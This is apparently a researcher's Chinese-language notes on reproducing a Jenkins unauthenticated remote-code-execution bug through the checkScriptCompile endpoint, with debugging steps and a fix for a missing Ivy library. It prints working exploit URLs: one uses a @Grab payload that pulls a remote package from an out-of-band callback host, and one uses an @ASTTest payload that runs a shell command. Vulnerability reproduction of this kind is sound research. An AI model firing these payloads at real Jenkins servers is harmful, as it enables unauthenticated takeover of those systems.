先访问
/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile
不带value,
跟进
workflow-cps.jar!\org\jenkinsci\plugins\workflow\cps\CpsFlowDefinition$DescriptorImpl#doCheckScriptCompile(@QueryParameter String value)
发现抛出了NullPointerException
这里传入value=shadowsock5,继续调试:
跟进:
groovy-all-2.4.12.jar!\groovy\lang\GroovyClassLoader#parseClass(String text)
继续尝试使用这个payload:(Grab注解)
/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0A@GrabResolver(name=%27test%27,%20root=%27http://3mqe92c2mowxdgiek3d7hpbvdmjc71.burpcollaborator.net%27)%0A@Grab(group=%27package%27,%20module=%27vultestvultest%27,%20version=%271%27)%0Aimport%20Payload;
发现没有找到这个类:org.apache.ivy.Ivy
难道是要把这个包放到jenkins的classpath里?
尝试搜索发现可能是缺少某个插件:
选择1.28版本进行安装:
http://ftp-chi.osuosl.org/pub/jenkins/plugins/ivy/1.28/ivy.hpi
后来发现这些有Ivy的插件有需要高版本的其他插件,而漏洞利用正是要利用这些插件的漏洞。于是手动将Ivy的jar包:
/home/77/.jenkins/plugins/ivy/WEB-INF/lib/ivy-2.1.0.jar
加上一些classpath里
/usr/lib/jvm/java-8-oracle/bin/java -Djava.util.logging.config.file=/home/77/repos/tomcat-8.0.38/conf/logging.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Djdk.tls.ephemeralDHKeySize=2048 -Djava.protocol.handler.pkgs=org.apache.catalina.webresources -agentlib:jdwp=transport=dt_socket,address=0.0.0.0:8000,server=y,suspend=n -Djava.endorsed.dirs=/home/77/repos/tomcat-8.0.38/endorsed -classpath /home/77/repos/tomcat-8.0.38/bin/bootstrap.jar:/home/77/repos/tomcat-8.0.38/bin/tomcat-juli.jar:/home/77/.jenkins/plugins/ivy/WEB-INF/lib/ivy-2.1.0.jar -Dcatalina.base=/home/77/repos/tomcat-8.0.38 -Dcatalina.home=/home/77/repos/tomcat-8.0.38 -Djava.io.tmpdir=/home/77/repos/tomcat-8.0.38/temp org.apache.catalina.startup.Bootstrap start
Pocsuite:
根据Orange的博客里
http://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html
说的,另外还有一种PoC形式是:(ASTTest注解)
@groovy.transform.ASTTest(value={
assert java.lang.Runtime.getRuntime().exec("touch pwned")
})
def x
完整请求为:
/jenkins-2.152-alpine/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/[email protected](value={assert%20java.lang.Runtime.getRuntime().exec(%22touch%20/tmp/jenkin_pwned1%22)})def%20x
而且不需要依赖Ivy这个库。
其他Jenkins漏洞参考: